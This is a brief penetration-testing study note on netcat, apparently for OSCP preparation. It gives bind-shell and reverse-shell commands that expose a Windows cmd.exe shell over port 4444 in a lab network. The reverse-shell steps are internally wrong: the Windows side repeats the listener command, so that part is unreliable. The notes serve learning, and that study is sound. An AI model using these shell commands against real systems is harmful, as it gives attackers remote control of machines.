OSCP Learning Notes - Netcat
Posted keepmoving1113
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了OSCP Learning Notes - Netcat相关的知识,希望对你有一定的参考价值。
Introduction to Netcat
- Connecting va Listening
- Bind Shells
- Attacker connects to victim on listening port
- Reverse Shells
- Victim connects to attacker on listening port
Basic usage:
nc -nv IP Port
Bind Shell:
1.On the Windows nc tool.
-nvlp 4444 -e cmd.exe
2. On the Kali nc tool.
nc -nv 10.0.0.16 4444
3.Result
Reverse Shells
1.On the Kali nc tool.
nc -nvlp 4444
2.On the Windows nc tool.
-nvlp 4444 -e cmd.exe
3. Result
以上是关于OSCP Learning Notes - Netcat的主要内容,如果未能解决你的问题,请参考以下文章
OSCP Learning Notes - Buffer Overflows
OSCP Learning Notes - Enumeration